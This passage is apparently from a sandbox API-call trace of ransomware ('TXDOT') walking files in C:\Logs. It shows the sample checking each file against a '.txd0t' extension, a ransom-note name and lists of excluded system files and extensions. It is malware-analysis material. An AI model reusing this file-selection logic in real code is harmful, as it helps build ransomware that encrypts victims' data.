(psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="iconcache.db") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="thumbs.db") returned -1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2=" ransomware ") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2=" ransom ") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="debug.txt") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="boot.ini") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="desktop.ini") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="autorun.inf") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="ntuser.dat") returned -1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="ntldr") returned -1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="ntdetect.com") returned -1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="bootfont.bin") returned 1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.946] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned=".evtx" [0071.946] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.946] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.947] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.947] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.947] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.947] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.947] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.947] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4Operational.evtx", cAlternateFileName="MI1C6C~1.EVT")) returned 1 [0071.947] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2=".") returned 1 [0071.947] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="..") returned 1 [0071.947] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.947] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.947] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" [0071.947] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4Operational.evtx") returned=".evtx" [0071.947] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2=" ransom ") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="debug.txt") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="boot.ini") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="ntldr") returned -1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.947] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.947] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4Operational.evtx") returned=".evtx" [0071.947] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.947] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.947] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.947] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.947] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.948] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.948] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.948] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Connectivity.evtx", cAlternateFileName="MI00FB~1.EVT")) returned 1 [0071.948] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2=".") returned 1 [0071.948] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="..") returned 1 [0071.948] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.948] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.948] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Connectivity.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx" [0071.948] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned=".evtx" [0071.948] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="bootsect.bak") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="iconcache.db") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="thumbs.db") returned -1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2=" ransomware ") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2=" ransom ") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="debug.txt") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="boot.ini") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="desktop.ini") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="autorun.inf") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="ntuser.dat") returned -1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="ntldr") returned -1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="ntdetect.com") returned -1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="bootfont.bin") returned 1 [0071.948] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Connectivity.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.948] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Connectivity.evtx") returned=".evtx" [0071.948] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.948] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.948] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.948] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.948] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.948] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.948] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.949] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97b042f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97b042f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBClient%4Operational.evtx", cAlternateFileName="MID8B0~1.EVT")) returned 1 [0071.949] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2=".") returned 1 [0071.949] StrCmpW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="..") returned 1 [0071.949] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.949] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.949] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBClient%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBClient%4Operational.evtx" [0071.949] PathFindExtensionW (pszPath="Microsoft-Windows-SMBClient%4Operational.evtx") returned=".evtx" [0071.949] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2=" ransom ") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="debug.txt") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="boot.ini") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="ntldr") returned -1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.949] StrCmpIW (psz1="Microsoft-Windows-SMBClient%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.949] PathFindExtensionW (pszPath="Microsoft-Windows-SMBClient%4Operational.evtx") returned=".evtx" [0071.949] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.949] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.949] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.949] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.949] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.949] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.949] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.949] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc97d66c8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc97d66c8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SmbClient%4Security.evtx", cAlternateFileName="MI8CEE~1.EVT")) returned 1 [0071.949] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2=".") returned 1 [0071.949] StrCmpW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="..") returned 1 [0071.950] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.950] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.950] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SmbClient%4Security.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx") returned="C:\\Logs\\Microsoft-Windows-SmbClient%4Security.evtx" [0071.950] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Security.evtx") returned=".evtx" [0071.950] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="bootsect.bak") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="iconcache.db") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="thumbs.db") returned -1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2=" ransomware ") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2=" ransom ") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="debug.txt") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="boot.ini") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="desktop.ini") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="autorun.inf") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="ntuser.dat") returned -1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="ntldr") returned -1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="ntdetect.com") returned -1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="bootfont.bin") returned 1 [0071.950] StrCmpIW (psz1="Microsoft-Windows-SmbClient%4Security.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.950] PathFindExtensionW (pszPath="Microsoft-Windows-SmbClient%4Security.evtx") returned=".evtx" [0071.950] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.950] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.950] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.950] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.950] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.950] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.950] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.950] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ea1c9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb1ea1c9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Audit.evtx", cAlternateFileName="MIE3AD~1.EVT")) returned 1 [0071.951] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2=".") returned 1 [0071.951] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="..") returned 1 [0071.951] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.951] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.951] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Audit.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" [0071.951] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Audit.evtx") returned=".evtx" [0071.951] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="bootsect.bak") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="iconcache.db") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="thumbs.db") returned -1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2=" ransomware ") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2=" ransom ") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="debug.txt") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="boot.ini") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="desktop.ini") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="autorun.inf") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="ntuser.dat") returned -1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="ntldr") returned -1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="ntdetect.com") returned -1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="bootfont.bin") returned 1 [0071.951] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Audit.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.951] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Audit.evtx") returned=".evtx" [0071.951] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.951] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.951] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.952] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.952] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.952] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.952] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.952] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb19dd19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb19dd19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Connectivity.evtx", cAlternateFileName="MI8248~1.EVT")) returned 1 [0071.952] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2=".") returned 1 [0071.952] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="..") returned 1 [0071.952] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.952] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.952] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Connectivity.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Connectivity.evtx" [0071.952] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned=".evtx" [0071.952] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="bootsect.bak") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="iconcache.db") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="thumbs.db") returned -1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2=" ransomware ") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2=" ransom ") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="debug.txt") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="boot.ini") returned 